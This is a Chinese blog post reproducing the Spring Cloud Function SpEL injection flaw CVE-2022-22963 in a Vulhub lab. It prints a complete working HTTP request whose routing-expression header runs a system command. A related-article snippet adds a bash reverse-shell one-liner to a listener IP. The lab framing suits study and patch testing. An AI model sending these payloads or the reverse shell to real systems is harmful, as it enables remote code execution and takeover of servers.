Spring Cloud Function SpEL 代码注入(CVE-2022-22963)漏洞复现

最新推荐文章于 2024-04-17 08:19:13 发布
最新推荐文章于 2024-04-17 08:19:13 发布
阅读量847 收藏 1
点赞数
分类专栏: # 靶场测试 # 漏洞复现 文章标签: spring cloud java spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677119/article/details/125483135
版权

文章目录

Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)漏洞复现

一、复现环境

Vulhub:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22963

二、复现过程

  1. 拉取docker环境
    在这里插入图片描述
    服务启动后,可通过地址:http://your-ip:8080 查看。
  2. 攻击载荷

使用bp回放Send有效载荷(请求方法为POST)

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4

test

进入容器可查看命令成功执行:

在这里插入图片描述

Tigirs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 2986
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5227
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
CVE-2022-22963-Spring-Core-RCE图形化利用工具_poc-yaml-cve-2022-22963-spring-spel-rce
最新发布
2401_83944297的博客
04-17 492
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。
CVE-2022-22963漏洞复现
Tender*的博客
08-10 286
是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。由于中,RoutingFunction类的apply方法将请求头中的参 数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。拉取环境发送如下数据包,expression头中包含的SpEL表达式将会被执行:网页 有ip 说明存在漏洞
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2121
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3769
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
然而,在 SpringCloud Function 中存在一个 SpEL 注入漏洞CVE-2022-22963),该漏洞可能会导致攻击者可以执行恶意代码,从而导致严重的安全问题。 SpELSpring Expression Language)是一种强大的表达式语言,...
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpELSpring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的详细分析和知识点总结。 一、漏洞概述 CVE-2022-...
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹...
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
CVE-2022-22947 分析
03-04
总结,CVE-2022-22947是一个严重的安全漏洞,影响Spring Cloud Gateway的SPEL表达式处理,可能导致远程代码执行。理解漏洞的工作原理和利用方式对于防止类似的安全威胁至关重要。及时更新和安全配置是防御此类漏洞的...
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
Spring框架中的spring-messaging模块提供了一种基于WebSocket的STOMP协议实现,STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞,因此攻击者可以通过构造恶意的消息来实现远程代码执行。 Windows平台...
spring-boot-annotation-spel.zip
10-14
SpringBoot 自定义注解,属性支持SPEL表达式。介绍了SPEL表达式的解析
Spring实战之SpEl语法实例详解
08-25
Spring应用程序中,SpEL广泛应用于Bean定义、依赖注入、AOP等方面。本文将详细介绍SpEL语法的实战实例,结合实例形式分析了SpEL创建数组、集合及解析变量等相关操作原理与实现技巧。 SpEL语法简介 ------------ ...
SpringBoot Function 漏洞复现(CVE-2022-22963)
weixin_63960760的博客
10-16 199
Spring Cloud Function 是基于Spring Boot 的函数计算框架 (FaaS,函数即服务,function as aservice),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑.
CVE-2022-22965 Spring core RCE漏洞复现
afei001
04-01 4078
Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中。
Spring Cloud Function SPEL表达式注入漏洞复现
xhwfa的博客
04-20 3529
漏洞编号:CVE-2022-22963 一、漏洞简述 Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默
cve-2022-22947漏洞原理
07-29
根据引用\[1\]和引用\[2\]的信息,CVE-2022-22947漏洞Spring Cloud Gateway中的一处命令注入漏洞。攻击者可以通过利用此漏洞执行SpEL表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。具体来说,当使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值